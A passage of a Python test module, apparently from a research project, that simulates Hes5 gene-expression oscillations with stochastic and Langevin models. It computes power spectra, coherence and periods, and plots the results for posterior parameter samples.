this_parameter = my_posterior_samples[results_index, parameter_indices[parameter_name]]
this_axis.errorbar(results_table[:,0] - this_parameter,
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(r'$\Delta$' + x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure2.tight_layout()
my_figure2.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_centered_sweep_' + parameter_name + '.pdf'))
def xest_approximate_power_spectrum_numerically(self):
number_of_traces = 100
repetition_number = 1
trace_and_repetition_numbers = np.array([[200,1],
[200,2],
[200,3],
# [100,5]])
[200,4],
[200,5],
[200,6],
[200,7],
[200,8],
[200,9],
[1000,10],
[1000,20]])
power_spectra = []
smoothened_power_spectra = []
coherences = np.zeros(trace_and_repetition_numbers.shape[0])
periods = np.zeros(trace_and_repetition_numbers.shape[0])
index = 0
for number_of_traces, repetition_number in trace_and_repetition_numbers:
print(number_of_traces)
print(repetition_number)
these_mrna_traces, these_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_number,
repression_threshold = 31400,
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
basal_transcription_rate = 11,
translation_rate = 29,
transcription_delay = 29,
initial_mRNA = 3,
initial_protein = 31400,
equilibration_time = 1000)
this_power_spectrum, this_coherence, this_period = hes5.calculate_power_spectrum_of_trajectories(these_protein_trajectories)
this_smoothened_power_spectrum = hes5.smoothen_power_spectrum(this_power_spectrum)
power_spectra.append(this_power_spectrum)
smoothened_power_spectra.append(this_smoothened_power_spectrum)
coherences[index] = this_coherence
periods[index] = this_period
index += 1
# theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
# basal_transcription_rate = 11,
# translation_rate = 29,
# repression_threshold = 31400,
# transcription_delay = 29,
# mRNA_degradation_rate = np.log(2)/30,
# hill_coefficient = 5,
# protein_degradation_rate = np.log(2)/90)
#
figuresize = (6,2.5)
my_figure = plt.figure(figsize = figuresize)
my_figure.add_subplot(131)
for counter, power_spectrum in enumerate(power_spectra):
if counter == 4:
plt.plot(power_spectrum[:,0],power_spectrum[:,1]+counter*200, color = 'green', alpha = 0.8)
elif counter > 6:
plt.plot(power_spectrum[:,0],power_spectrum[:,1]+counter*200, color = 'blue')
else:
plt.plot(power_spectrum[:,0],power_spectrum[:,1]+counter*200, color = 'black', alpha = 0.8)
# plt.plot(theoretical_power_spectrum[:,0],theoretical_power_spectrum[:,1], color = 'blue', alpha = 0.8)
plt.plot(smoothened_power_spectra[counter][:,0],
smoothened_power_spectra[counter][:,1]+counter*200, color = 'grey', alpha = 0.8)
plt.xlim(0.000,0.01)
# plt.ylim(0,100)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Frequency')
plt.ylabel('Probability + offset')
my_figure.add_subplot(132)
plt.plot(trace_and_repetition_numbers[:,1], coherences, color = 'black')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.axvline(5, color = 'green')
plt.ylim(0,0.5)
plt.xlabel('Trace length [1500min]')
plt.ylabel('Coherence estimate')
my_figure.add_subplot(133)
plt.plot(trace_and_repetition_numbers[:,1], periods, color = 'black')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(200,300)
plt.axvline(5, color = 'green')
plt.xlabel('Trace length [1500min]')
plt.ylabel('Period estimate')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','Coherence_measure_test.pdf'))
def xest_plot_multiple_parameter_variation_differently(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_100reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'multiple_degradation_sweep_results.npy'))
#Find all traces where coherence is zero at the entry log(2)/90,
#i.e. close to at entry three of the results
small_coherence_indices, = np.where(my_parameter_sweep_results[:,3,4] < 0.1)
small_coherence_index = small_coherence_indices[0]
this_small_coherence_parameter = my_posterior_samples[small_coherence_index]
extra_large_coherence_indices, = np.where(my_parameter_sweep_results[:,2,4]>0.1)
extra_large_coherence_index = extra_large_coherence_indices[0]
this_extra_large_coherence_parameter = my_posterior_samples[extra_large_coherence_index]
large_coherence_indices = list( set( range(my_parameter_sweep_results.shape[0])) -
set( small_coherence_indices).union(
set( extra_large_coherence_indices ))
)
large_coherence_index = large_coherence_indices[3]
this_large_coherence_parameter = my_posterior_samples[large_coherence_index]
my_figure = plt.figure( figsize = (6.5, 3.5) )
my_figure.add_subplot(231)
for parameter_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_index in small_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,3], color ='purple', alpha = 0.1)
elif parameter_index in extra_large_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,3], color ='blue', alpha = 0.1)
else:
plt.plot(results_table[:,0],
results_table[:,3], color ='green', alpha = 0.01)
plt.plot(my_parameter_sweep_results[large_coherence_index,:,0],
my_parameter_sweep_results[large_coherence_index,:,3], color ='green')
plt.plot(my_parameter_sweep_results[extra_large_coherence_index,:,0],
my_parameter_sweep_results[extra_large_coherence_index,:,3], color ='blue')
plt.plot(my_parameter_sweep_results[small_coherence_index,:,0],
my_parameter_sweep_results[small_coherence_index,:,3], color ='purple')
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Period [min]')
plt.ylim(0,700)
my_figure.add_subplot(232)
for parameter_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_index in small_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,4], color = 'purple', alpha = 0.1)
elif parameter_index in extra_large_coherence_indices:
plt.plot(results_table[:,0],
results_table[:,4], color = 'blue', alpha = 0.1)
else:
plt.plot(results_table[:,0],
results_table[:,4], color = 'green', alpha = 0.01)
plt.plot(my_parameter_sweep_results[large_coherence_index,:,0],
my_parameter_sweep_results[large_coherence_index,:,4], color = 'green')
plt.plot(my_parameter_sweep_results[extra_large_coherence_index,:,0],
my_parameter_sweep_results[extra_large_coherence_index,:,4], color = 'blue')
plt.plot(my_parameter_sweep_results[small_coherence_index,:,0],
my_parameter_sweep_results[small_coherence_index,:,4], color = 'purple')
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
my_figure.add_subplot(233)
for parameter_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_index in small_coherence_indices:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000,
color = 'purple', alpha = 0.1)
elif parameter_index in extra_large_coherence_indices:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000,
color = 'blue', alpha = 0.1)
else:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000,
color = 'green', alpha = 0.01)
plt.errorbar(my_parameter_sweep_results[extra_large_coherence_index,:,0],
my_parameter_sweep_results[extra_large_coherence_index,:,1]/10000,
yerr = my_parameter_sweep_results[large_coherence_index,:,2]/10000,
color = 'blue')
plt.errorbar(my_parameter_sweep_results[large_coherence_index,:,0],
my_parameter_sweep_results[large_coherence_index,:,1]/10000,
yerr = my_parameter_sweep_results[large_coherence_index,:,2]/10000,
color = 'green')
plt.errorbar(my_parameter_sweep_results[small_coherence_index,:,0],
my_parameter_sweep_results[small_coherence_index,:,1]/10000,
yerr = my_parameter_sweep_results[small_coherence_index,:,2]/10000,
color = 'purple')
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(0,15)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Expression/1e4')
my_figure.add_subplot(234)
this_small_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_small_coherence_parameter[2],
basal_transcription_rate = this_small_coherence_parameter[0],
translation_rate = this_small_coherence_parameter[1],
initial_mRNA = 10.0,
transcription_delay = this_small_coherence_parameter[3],
initial_protein = this_small_coherence_parameter[2],
equilibration_time = 1000.0 )
plt.plot( this_small_trace[:,0]/100, this_small_trace[:,2]/10000, color = 'purple')
plt.text(0.1, 0.2, r'$\alpha_m =$ ' + '{:.2f}'.format(this_small_coherence_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(this_small_coherence_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(this_small_coherence_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_small_coherence_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.ylim(0,10)
plt.xlabel('Time [100min]')
plt.ylabel('Expression/1e4')
my_figure.add_subplot(235)
this_large_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_large_coherence_parameter[2],
basal_transcription_rate = this_large_coherence_parameter[0],
translation_rate = this_large_coherence_parameter[1],
initial_mRNA = 10.0,
transcription_delay = this_large_coherence_parameter[3],
initial_protein = this_large_coherence_parameter[2],
equilibration_time = 1000.0 )
plt.plot( this_large_trace[:,0]/100, this_large_trace[:,2]/10000, color = 'green')
plt.text(0.1, 0.2, r'$\alpha_m =$ ' + '{:.2f}'.format(this_large_coherence_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(this_large_coherence_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(this_large_coherence_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_large_coherence_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.ylim(0,10)
plt.xlabel('Time [100min]')
plt.ylabel('Expression/1e4')
my_figure.add_subplot(236)
this_extra_large_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_extra_large_coherence_parameter[2],
basal_transcription_rate = this_extra_large_coherence_parameter[0],
translation_rate = this_extra_large_coherence_parameter[1],
initial_mRNA = 10.0,
transcription_delay = this_extra_large_coherence_parameter[3],
initial_protein = this_extra_large_coherence_parameter[2],
equilibration_time = 1000.0 )
plt.plot( this_extra_large_trace[:,0]/100, this_extra_large_trace[:,2]/10000, color = 'blue')
plt.text(0.1, 0.2, r'$\alpha_m =$ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_extra_large_coherence_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.ylim(0,10)
plt.xlabel('Time [100min]')
plt.ylabel('Expression/1e4')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_degradation_sweep_examples.pdf'))
def xest_validation_at_low_transcription_rates(self):
# pick three parameter values with low mrna and plot example mrna, example protein, and power spectrum
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
number_of_traces = 200
repetition_factor = 5
# number_of_traces = 4
# repetition_factor = 1
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<2))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_results = model_results[accepted_indices]
lowest_indices = np.argsort(my_posterior_samples[:,0])
# import pdb; pdb.set_trace()
##
# first_samples
##
first_parameter = my_posterior_samples[lowest_indices[0]]
print(first_parameter)
first_mRNA_trajectories, first_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = first_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = first_parameter[3],
basal_transcription_rate = first_parameter[0],
translation_rate = first_parameter[1],
initial_mRNA = 10,
initial_protein = first_parameter[2],
equilibration_time = 1000,
synchronize = False )
first_langevin_mRNA_trajectories, first_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = first_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = first_parameter[3],
basal_transcription_rate = first_parameter[0],
translation_rate = first_parameter[1],
initial_mRNA = 10,
initial_protein = first_parameter[2],
equilibration_time = 1000)
first_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = first_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = first_parameter[3],
basal_transcription_rate = first_parameter[0],
translation_rate = first_parameter[1]
)
first_theoretical_coherence, first_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(first_theoretical_power_spectrum)
first_power_spectrum, first_coherence, first_period = hes5.calculate_power_spectrum_of_trajectories(first_protein_trajectories)
first_langevin_power_spectrum, first_langevin_coherence, first_langevin_period = hes5.calculate_power_spectrum_of_trajectories(first_langevin_protein_trajectories)
figuresize = (6,10)
my_figure = plt.figure(figsize = figuresize)
my_figure.add_subplot(521)
plt.plot( first_mRNA_trajectories[:,0],
first_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*10', color = 'black',
lw = 0.5 )
plt.plot( first_protein_trajectories[:,0],
first_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( first_langevin_mRNA_trajectories[:,0],
first_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*10', color = 'green',
lw = 0.5 )
plt.plot( first_langevin_protein_trajectories[:,0],
first_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.text(0.1, 0.3, r'$\alpha_m =$ ' + '{:.2f}'.format(first_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(first_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(first_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(first_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.ylim(0,9)
plt.xlim(0,1500)
# plt.legend()
my_figure.add_subplot(522)
for trajectory in first_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((first_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(first_power_spectrum[:,0],
first_power_spectrum[:,1], color = 'black')
plt.plot(first_langevin_power_spectrum[:,0],
first_langevin_power_spectrum[:,1], color = 'green')
plt.plot(first_theoretical_power_spectrum[:,0],
first_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Frequency')
plt.ylabel('Occurence')
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(first_coherence) + ' '
"{:.2f}".format(first_langevin_coherence) + ' ' +
"{:.2f}".format(first_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(first_period) + ' '
"{:.2f}".format(first_langevin_period) + ' ' +
"{:.2f}".format(first_theoretical_period),
verticalalignment='top', horizontalalignment='right',
transform=plt.gca().transAxes,
fontsize = 5)
##
# Hes5 samples
##
second_parameter = my_posterior_samples[lowest_indices[1]]
second_mRNA_trajectories, second_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = second_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = second_parameter[3],
basal_transcription_rate = second_parameter[0],
translation_rate = second_parameter[1],
initial_mRNA = 10,
initial_protein = second_parameter[2],
equilibration_time = 1000,
synchronize = False )
second_langevin_mRNA_trajectories, second_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = second_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = second_parameter[3],
basal_transcription_rate = second_parameter[0],
translation_rate = second_parameter[1],
initial_mRNA = 10,
initial_protein = second_parameter[2],
equilibration_time = 1000)
second_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = second_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = second_parameter[3],
basal_transcription_rate = second_parameter[0],
translation_rate = second_parameter[1]
)
second_theoretical_coherence, second_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(second_theoretical_power_spectrum)
second_power_spectrum, second_coherence, second_period = hes5.calculate_power_spectrum_of_trajectories(second_protein_trajectories)
second_langevin_power_spectrum, second_langevin_coherence, second_langevin_period = hes5.calculate_power_spectrum_of_trajectories(second_langevin_protein_trajectories)
my_figure.add_subplot(523)
mrna_example, = plt.plot( second_mRNA_trajectories[:,0],
second_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( second_protein_trajectories[:,0],
second_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( second_langevin_mRNA_trajectories[:,0],
second_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( second_langevin_protein_trajectories[:,0],
second_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.text(0.1, 0.25, r'$\alpha_m =$ ' + '{:.2f}'.format(second_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(second_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(second_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(second_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.ylim(0,9)
plt.xlim(0,1500)
# plt.legend()
my_figure.add_subplot(524)
for trajectory in second_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((second_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(second_power_spectrum[:,0],
second_power_spectrum[:,1], color = 'black')
plt.plot(second_langevin_power_spectrum[:,0],
second_langevin_power_spectrum[:,1], color = 'green')
plt.plot(second_theoretical_power_spectrum[:,0],
second_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(second_coherence) + ' '
"{:.2f}".format(second_langevin_coherence) + ' ' +
"{:.2f}".format(second_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(second_period) + ' '
"{:.2f}".format(second_langevin_period) + ' ' +
"{:.2f}".format(second_theoretical_period),
verticalalignment='top',
fontsize = 5,
horizontalalignment='right',
transform=plt.gca().transAxes)
##
# third example
##
# generate the random samples:
third_parameter = my_posterior_samples[lowest_indices[2]]
third_mRNA_trajectories, third_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = third_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = third_parameter[3],
basal_transcription_rate = third_parameter[0],
translation_rate = third_parameter[1],
initial_mRNA = 10,
initial_protein = third_parameter[2],
equilibration_time = 1000,
synchronize = False )
third_langevin_mRNA_trajectories, third_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = third_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = third_parameter[3],
basal_transcription_rate = third_parameter[0],
translation_rate = third_parameter[1],
initial_mRNA = 10,
initial_protein = third_parameter[2],
equilibration_time = 1000)
third_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = third_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = third_parameter[3],
basal_transcription_rate = third_parameter[0],
translation_rate = third_parameter[1]
)
third_theoretical_coherence, third_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(third_theoretical_power_spectrum)
third_power_spectrum, third_coherence, third_period = hes5.calculate_power_spectrum_of_trajectories(third_protein_trajectories)
third_langevin_power_spectrum, third_langevin_coherence, third_langevin_period = hes5.calculate_power_spectrum_of_trajectories(third_langevin_protein_trajectories)
my_figure.add_subplot(525)
mrna_example, = plt.plot( third_mRNA_trajectories[:,0],
third_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( third_protein_trajectories[:,0],
third_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( third_langevin_mRNA_trajectories[:,0],
third_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( third_langevin_protein_trajectories[:,0],
third_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.xlim(0,1500)
plt.ylim(0,9)
plt.text(0.1, 0.22, r'$\alpha_m =$ ' + '{:.2f}'.format(third_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(third_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(third_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(third_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
# plt.legend()
my_figure.add_subplot(526)
for trajectory in third_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((third_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(third_power_spectrum[:,0],
third_power_spectrum[:,1], color = 'black')
plt.plot(third_langevin_power_spectrum[:,0],
third_langevin_power_spectrum[:,1], color = 'green')
plt.plot(third_theoretical_power_spectrum[:,0],
third_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
plt.text(0.95, 0.95, 'Coherence:\n' + "{:.2f}".format(third_coherence) + ' '
"{:.2f}".format(third_langevin_coherence) + ' ' +
"{:.2f}".format(third_theoretical_coherence) +
'\nPeriod:\n' + "{:.2f}".format(third_period) + ' '
"{:.2f}".format(third_langevin_period) + ' ' +
"{:.2f}".format(third_theoretical_period),
fontsize = 5,
verticalalignment='top', horizontalalignment='right',
transform=plt.gca().transAxes)
##
# fourth example
##
# generate the random samples:
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
# np.logical_and(model_results[:,0]<65000, #cell_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<0.5))))) #time_delay
# my_posterior_samples = prior_samples[accepted_indices]
fourth_parameter = my_posterior_samples[lowest_indices[3]]
fourth_mRNA_trajectories, fourth_protein_trajectories = hes5.generate_multiple_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fourth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = fourth_parameter[3],
basal_transcription_rate = fourth_parameter[0],
translation_rate = fourth_parameter[1],
initial_mRNA = 10,
initial_protein = fourth_parameter[2],
equilibration_time = 1000,
synchronize = False )
fourth_langevin_mRNA_trajectories, fourth_langevin_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_traces,
duration = 1500*repetition_factor,
repression_threshold = fourth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = fourth_parameter[3],
basal_transcription_rate = fourth_parameter[0],
translation_rate = fourth_parameter[1],
initial_mRNA = 10,
initial_protein = fourth_parameter[2],
equilibration_time = 1000)
fourth_theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point(
repression_threshold = fourth_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = fourth_parameter[3],
basal_transcription_rate = fourth_parameter[0],
translation_rate = fourth_parameter[1]
)
fourth_theoretical_coherence, fourth_theoretical_period = hes5.calculate_coherence_and_period_of_power_spectrum(fourth_theoretical_power_spectrum)
fourth_power_spectrum, fourth_coherence, fourth_period = hes5.calculate_power_spectrum_of_trajectories(fourth_protein_trajectories)
fourth_langevin_power_spectrum, fourth_langevin_coherence, fourth_langevin_period = hes5.calculate_power_spectrum_of_trajectories(fourth_langevin_protein_trajectories)
my_figure.add_subplot(527)
mrna_example, = plt.plot( fourth_mRNA_trajectories[:,0],
fourth_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'black',
lw = 0.5 )
protein_example, = plt.plot( fourth_protein_trajectories[:,0],
fourth_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'black', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.plot( fourth_langevin_mRNA_trajectories[:,0],
fourth_langevin_mRNA_trajectories[:,1]*0.1, label = 'mRNA example*1000', color = 'green',
lw = 0.5 )
plt.plot( fourth_langevin_protein_trajectories[:,0],
fourth_langevin_protein_trajectories[:,1]/10000, label = 'Protein example', color = 'green', ls = '--',
lw = 0.5, dashes = [1,1] )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Time [min]')
plt.ylabel('Copy number [1e4]')
plt.xlim(0,1500)
plt.ylim(0,9)
plt.text(0.1, 0.34, r'$\alpha_m =$ ' + '{:.2f}'.format(fourth_parameter[0]) +
r', $\alpha_p =$ ' + '{:.2f}'.format(fourth_parameter[1]) +
'\n' + r'$p_0 = $ ' + '{:.2f}'.format(fourth_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(fourth_parameter[3]),
fontsize = 5,
transform=plt.gca().transAxes)
# plt.legend()
my_figure.add_subplot(528)
for trajectory in fourth_protein_trajectories[:,1:].transpose():
compound_trajectory = np.vstack((fourth_protein_trajectories[:,0],trajectory)).transpose()
this_power_spectrum,_,_ = hes5.calculate_power_spectrum_of_trajectory(compound_trajectory)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1], color = 'black', alpha = 0.01)
plt.plot(fourth_power_spectrum[:,0],
fourth_power_spectrum[:,1], color = 'black')
plt.plot(fourth_langevin_power_spectrum[:,0],
fourth_langevin_power_spectrum[:,1], color = 'green')
plt.plot(fourth_theoretical_power_spectrum[:,0],
fourth_theoretical_power_spectrum[:,1], color = 'blue')
plt.xlim(0,0.01)
# plt.ylim(0,100)
plt.xlabel('Frequency')
plt.ylabel('Occurence')
plt.gca().locator_params(axis='x', tight = True, nbins=4)
# import pdb; pdb.set_trace()
